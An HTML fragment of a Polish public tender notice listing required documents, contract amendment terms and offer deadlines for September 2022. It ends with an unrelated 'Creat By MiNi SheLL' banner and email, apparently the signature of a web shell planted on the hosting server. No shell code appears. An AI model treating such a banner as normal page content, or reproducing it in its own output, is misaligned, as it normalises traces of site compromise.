Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.1. W celu potwierdzenia przez Wykonawcę warunków udziału w postępowaniu dotyczących <br/> zdolności technicznej lub zawodowej Zamawiający żąda następujących podmiotowych środków <br/> dowodowych:<br/> -	wykazu dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.5. Etykiety - szczegółowy opis oferowanego przedmiotu zamówienia z uwzględnieniem elementów: prospekty, foldery, ulotki, materiały informacyjne w języku polskim potwierdzające parametry określone w SWZ dla przedmiotu zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.1. Wypełniony Formularz Ofertowy stanowiący Załącznik Nr 2 do niniejszej specyfikacji<br/>5. Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia zamieszcza informacje o podwykonawcach w oświadczeniu, o którym mowa w pkt 1.2.<br/>1.6. Pełnomocnictwa - jeżeli oferta nie jest podpisania przez osobę upoważnioną i wykazaną w KRS.<br/>1.7. Inne oświadczenia niezbędne dla prawidłowej oceny złożonej oferty wynikającej z SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/><br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia są zobowiązani do łącznego spełnienia takich samych warunków udziału w postępowaniu, jak wykonawcy występujący samodzielnie tj.: przy ocenie spełnienia warunków, zdolności technicznej lub zawodowej, Zamawiający będzie brał pod uwagę łączne spełnienie tego warunku dla Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany i uzupełnienia do niniejszej umowy mogą być dokonane za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.<br/>1.	Zgodnie z art. 455 ustawy Prawo zamówień publicznych Strony dopuszczają możliwość dokonania zmian w umowie na warunkach określonych w niniejszym przepisie oraz w przypadku gdy Wykonawcę, któremu Zamawiający udzielił zamówienia ma zastąpić nowy Wykonawca w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcie stosowania przepisów ustawy. Wprowadzenie powyższej zmiany wymaga podpisania aneksu za zgodą obydwu Stron.<br/>2. Strony dopuszczają możliwość zmian umowy w następujących przypadkach:<br/>2.1	Zmiana stron umowy.<br/>2.2 Zmiana banków lub numerów kont bankowych stron.<br/>2.3	Zmiana stawek podatku VAT.<br/>2.4	Zmiana warunków płatności - w tym zmiana ilości rat, możliwość wcześniejszej spłaty.<br/>2.5	Możliwości wcześniejszej spłaty rat bez dodatkowych opłat. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma zakupowa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-15 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com